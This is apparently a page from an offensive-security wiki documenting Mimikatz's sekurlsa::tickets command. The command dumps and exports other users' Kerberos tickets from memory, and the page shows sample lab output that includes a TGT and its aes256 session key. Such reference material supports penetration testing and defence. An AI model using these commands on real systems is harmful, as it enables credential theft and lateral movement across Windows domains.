tickets

sekurlsa::tickets lists Kerberos tickets belonging to all authenticated users on the target server/workstation. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. Sekurlsa can also access tickets of others sessions (users). It has the following command line argument:

  • /export: tickets are exported in .kirbi files. They start with user's LUID and group number (0 = TGS, 1 = client ticket(?) and 2 = TGT). The tickets are saved in the current directory.

This command requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).

mimikatz # sekurlsa::tickets

Authentication Id : 0 ; 697146 (00000000:000aa33a)
Session           : Service from 0
User Name         : MediaAdmin$
Domain            : hacklab
Logon Server      : DC
Logon Time        : 10/17/2021 4:22:01 AM
SID               : S-1-5-21-2725560159-1428537199-2260736313-1427

         * Username : MediaAdmin$
         * Domain   : HACKLAB.LOCAL
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 10/17/2021 4:22:01 AM ; 10/17/2021 2:22:01 PM ; 10/24/2021 4:22:01 AM
           Service Name (02) : krbtgt ; HACKLAB.LOCAL ; @ HACKLAB.LOCAL
           Target Name  (02) : krbtgt ; hacklab.local ; @ HACKLAB.LOCAL
           Client Name  (01) : MediaAdmin$ ; @ HACKLAB.LOCAL ( hacklab.local )
           Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             1351322f734539c08a78792f642fc4fd4ff8aea1fe3b4a0edf83778b5ed878e9
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
PrevioussspNexttrust

Last updated